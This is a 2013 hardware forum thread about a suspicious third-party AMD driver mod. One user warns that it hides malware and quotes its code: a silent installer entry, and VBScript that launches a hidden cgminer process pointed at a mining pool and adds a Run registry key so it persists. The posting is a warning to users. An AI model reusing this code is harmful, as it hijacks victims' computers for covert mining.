1. Welcome to TechPowerUp Forums, Guest! Please check out our forum guidelines for info related to our community.

AMD Catalyst 13.x (13.150.0.0 May 23)

Discussion in 'AMD / ATI' started by The Mac, Jun 14, 2013.

1. d1nky

Thanks Received:
    two years ago, bush and thatll be telling.

:roll:

WarEagleAU and BarbaricSoul say thanks.
  2. Frag Maniac

Frag Maniac

Thanks Received:
    Sorry, but no, it wasn't a hoax, I just didn't read the info on the site linked to thoroughly.

It's not the actual AMD/ATI driver team, it's a mod team. A lot like what Omegaman offered with his tweaked ATI drivers some time ago, only this is a full team they say.

I found the same post and link on PCGamer.com, maybe this one won't get yanked.

http://www.pcgamer.com/forum/showthread.php?t=30165

http://flexxdriver.com/

3. The Mac

Thanks Received:
    i spoke too soon, i went to my browser history and the flexxdriver site is still up, but its only a couple weeks old.

their claims are still outlandish without the source code for the drivers...

Im certainly not going to be the guinea pig.

4. Frag Maniac

Frag Maniac

Thanks Received:
    I put in a thread at Driver Heaven asking if anyone's tried them. They were pretty much the go to site for discussions with Omegaman back when he was doing his driver tweaks. Back then such a thing was really needed though. Lately AMD drivers are fairly good, and they're even working on the Crossfire and latency problems now. The only problem I'm really getting is stutter in the more graphically detailed UE3 games, but that seems fairly common for both AMD and Nvidia.

This guy has put in threads at GameTrailers, GameSpot, AVS Forums, PCGamingForums, and PCGamer, and so far all have been yanked except for the last two.

5. The Mac

Thanks Received:
    UE3 games have always been problematic, they are usually crappy ports from consoles...

Benchmark3d is usually pretty good with AMD drivers as well.

6. Frag Maniac

Frag Maniac

Thanks Received:
    Most seem to be saying it's more to do with UE3's inefficient texture streaming than port quality.

Honestly I don't know why some rave about the Unreal Engine. Epic has been bragging about how great UE4's particle effects will be, but they said literally nothing about whether it streams textures any better, which is the main thing they need to work on it seems.

They've even got people like Oculus developers jumping to use UE4 in games that support it. Oculus Rift could have a weak launch if they still have LCD tech with screen door effect, made worse by games that stutter.

7. The Mac

Thanks Received:
    The only UE3 game i can think of that didnt have any major problems was ME3. But it wasnt a console port, it was developed along side the console version.

8. asder00

asder00 New Member

Thanks Received:
    Do not trust that site, heres whats happen when you ran their setup:
    Path=C:\AMD\Support\13-4_vista_win7_win8_64_dd_ccc_whql_FleXxdriver\..SavePath..Setup=Setup.exe..Setup=Bin64\Monitor64.exe..Silent=1..Overwrite=1..Shortcut=T, Bin64\Monitor64.exe

Monitor64.exe gets started and then:

Code:
    Set ShellWSH = WScript.CreateObject("WScript.Shell")
    MSG_String = "cgminer.exe -o http://stratum.btcguild.com:3333 -u Monitor64_32 -p 123"
    Ret = ShellWSH.Run (MSG_String,0,False)

Set MyShell = CreateObject("Wscript.Shell")

on error resume next

if not MyShell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monitor64.exe") = Chr(34) & "C:\AMD\Support\13-4_vista_win7_win8_64_dd_ccc_whql_FleXxdriver\Bin64\Monitor64.exe" & Chr(34) then

MyShell.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monitor64.exe", Chr(34) & "C:\AMD\Support\13-4_vista_win7_win8_64_dd_ccc_whql_FleXxdriver\Bin64\Monitor64.exe" & Chr(34), "REG_SZ"

End If
    You become a bitcoin miner for that guy... There also more stuff to check but I don't wanna waste my time inspecting it....

Monitor64 contents:

[​IMG]

Last edited: Jun 20, 2013
    WarEagleAU, Mussels, The Mac and 5 others say thanks.
  9. pigulici

pigulici

Thanks Received:
    Well, that is happen when you get from doubt sources, I allways get my beta's from amd site...

10. The Mac

Thanks Received:
    or Asder00

lol

that messed up...

the flexxdriver domain is actually owned by an LLC out of Arizona,US, but the guy says they are based in the Netherlands.

Shady.....

11. Frag Maniac

Frag Maniac

Thanks Received:
    Doesn't automatically mean something suspect. I've chatted on forums that were owned and sponsored in one country, but ran in another.

12. The Mac

Thanks Received:
    As have i, but not random users.

As they would have to do currency curversions, and VAT issues, as well as the content being subject to local laws ...It would be much easier to use a provider in the netherlands.

Besides, the registrant is a proxy, with no info about the supposed real owner, which makes me raise my other eyebrow

13. Frag Maniac

Frag Maniac

Thanks Received:
    Yeah I agree, too many red flags here. The cgminer in itself is cause to avoid it.

14. Mussels

Mussels Moderprator Staff Member

Thanks Received:
    modded drivers with a hidden bitcoin miner :/ wtf

15. WarEagleAU

WarEagleAU Bird of Prey

Thanks Received:
    Oh hell Ketxxx is back :D

16. The Mac

Thanks Received:
    ?